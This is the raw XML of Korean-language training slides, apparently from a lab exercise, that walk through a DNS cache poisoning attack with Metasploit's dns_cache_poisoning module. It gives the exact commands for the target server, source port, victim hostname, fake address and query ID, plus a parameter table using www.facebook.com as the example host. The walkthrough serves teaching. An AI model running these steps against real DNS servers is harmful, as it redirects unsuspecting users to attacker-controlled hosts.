            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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241" name="_x197188352">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E07DB87-EE7B-43FC-8A39-69DD32363B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180" y="687859"/>
            <a:ext cx="5400675" cy="1895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FCDD0D74-68F9-436E-95DA-A938F7A60601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500180" y="3748510"/>
          <a:ext cx="5328158" cy="1224026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3599208759"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696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참고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2379462"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="844296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※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질의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 순차적으로 증가하는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DNS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서버는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1980~90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년대에 사용되었던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BIND4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임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165100" marR="0" indent="-16510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※ 1990~2000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년대에 사용되었던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BIND8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은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를 섞어서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(shuffle)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사용하거나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풀을 사용하는 옵션만 제공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※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현재 주로 사용되고 있는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BIND9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은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풀 사용만 가능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74181591"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B04E0F-AB60-49B8-AD10-9ED6EDF206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6415" y="768651"/>
            <a:ext cx="5321990" cy="25652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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76372707-B768-45DA-B4F0-1A727B8B4B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6415" y="4196565"/>
            <a:ext cx="3923308" cy="416255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23058862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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 모듈의 옵션 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; show options</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>7) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET RHOST 10.10.1.14</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET SRCPORT 33333</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의를 보낼 때 사용하는 포트 번호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>오염 대상 호스트 설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET NEWADDR 10.10.1.99</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>위에서 설정한 호스트의 가짜 주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 설정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> auxiliary(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns_cache_poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) &gt; SET BASEID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>※ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: BASEID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 통해 획득한 마지막 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 사용하면 되며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>진수로 변환하여 입력해야 함</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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4" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77E8097B-8C3D-442B-8ED1-2581D6C7C4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498" y="915609"/>
            <a:ext cx="5400040" cy="1963166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic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A219C35E-2B5A-41E0-B9DE-21029DB24664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500498" y="2994214"/>
          <a:ext cx="5327904" cy="1970024"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1129030">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2999008096"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2854198">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1789836265"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1344676">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1681651181"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23469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이름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설명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예제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1585921"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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BASEID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주입할 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DNS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응답의 시작 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47295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1545366"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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HOSTNAME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오염시킬 호스트 이름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www.facebook.com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1724997"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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NEWADDR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오염시킬 호스트의 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IP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주소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10.10.1.99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49938112"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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RHOST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공격 대상 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DNS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서버 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IP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주소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10.10.1.14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14320646"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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SRCPORT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공격 대상 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DNS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서버의 질의 소스 포트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33333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18156104"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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UPDNS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상위 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DNS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서버의 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IP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주소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10.10.1.99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1804968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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XIDS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주입할 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DNS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응답의 수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27962063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26FD0EF-3009-4A90-B435-BDB0F900E7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976" y="5871331"/>
            <a:ext cx="4528947" cy="377952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A99B5C-D928-4A0A-96BF-CF9A187E93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4524" y="920628"/>
            <a:ext cx="4693920" cy="350520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DB08161-BA26-4517-B8E0-D14C0116B4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5930" y="2279044"/>
            <a:ext cx="5237480" cy="395605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
